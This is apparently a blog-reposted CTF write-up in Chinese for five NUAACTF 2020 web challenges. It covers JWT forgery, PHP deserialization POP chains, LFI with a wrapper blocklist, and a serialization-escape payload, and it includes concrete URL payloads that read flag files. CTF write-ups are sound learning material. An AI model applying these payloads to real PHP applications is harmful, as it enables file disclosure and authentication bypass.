• 2020-NUAACTF-Web-writeup


    本文首发于Leon的Blog,如需转载请注明原地址并联系作者

    都是简单题,简单写一写

    web1-checkin

    F12得到flag

    nuaactf{we1cOme_to_NuaAcTF}

    web2-jwt

    根据题目,登录后抓包看见jwt,base64解一下看见格式,然后爆破secret,最后username构造为admin伪造jwt即可:

    nuaactf{haojiGuoGuoTql}

    web3-easypop

    题目如图,payload没留

    简单的反序列化,将lemon类的$ClassObj实例化为evil类即可

    nuaactf{you_can_really_p0p}

    web4-command

    F12源码看见include.php,访问之,url出现?file=index

    简单的文件包含,用伪协议读读include.php源码:

     1 //include.php
     2 <?php  error_reporting(0);
     3 @$file = $_GET["file"];
     4 if(isset($file)) {
     5   if (preg_match('/http|data|ftp|input|%00|flag/i', $file) || strstr($file,"..") !== FALSE || strlen($file)>=100) {
     6     echo "<p> error! </p>";
     7   } else {
     8     include($file.'.php');
     9     setcookie("tips","createfun.php");
    10   }
    11 } else {
    12   header('Location:include.php?file=index');
    13 }
    14 ?>

    发现提示createfun.php,继续读:

    <?php
    $func = @$_GET['func'];
    $arg = @$_GET['arg'];
    if(isset($func)&&isset($arg)){$func($arg,'');}

    直接payload:createfun.php?func=show_source&arg=flag.php

    得到:

    <?php
    $flag="nuaactf{php_IS_thE_best_language}";
    ?>

    web5

    直接就安恒4月赛的原题,改过了replace

    原题见本站:https://clq0.top/2020/05/minil-ctf/#ezbypass

    源码:

    <?php
    
    show_source("index.php");
    
    function filter_nohack($data) {
        return str_replace('flag', '', $data);
    
    }
    
    class A{
        public $username;
        public $password;
        function __construct($a, $b){
            $this->username = $a;
            $this->password = $b;
        }
    }
    class B{
        public $b = 'gqy';
        function __destruct(){
            $c = 'a'.$this->b;
            echo $c;
        }
    }
    class C{
        public $c;
        function __toString(){
            //flag.php
            echo file_get_contents($this->c);
           return 'nice';
        }
    
    }
    
    $a = new A($_GET['a'],$_GET['b']);
    
    $b = unserialize(filter_nohack(serialize($a)));

    这里直接是将flag置空,4字符变0字符,根据原题目的payload,因为要吞掉后面23个字符,4*6=24,所以前面构造6个flag,后面补一个字符,然后flag.php的flag要双写

    payload:?a=flagflagflagflagflagflag&b=A";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flflagag.php";}}

    flag{you_can_readlly_dance}

      /

  • 相关阅读:
    c# 集合运算
    Nuxt
    引入js,不共享变量
    sourcetree将存在的本地项目提交到远程仓库
    c#DateTime与unix时间戳互相转换
    IfcBoundingBox
    IfcBooleanResult
    IfcAnnotationFillArea
    IfcGeometricRepresentationItem
    IfcRepresentationItem
  • 原文地址:https://www.cnblogs.com/clqnotes/p/12997294.html
Copyright © 2020-2023  润新知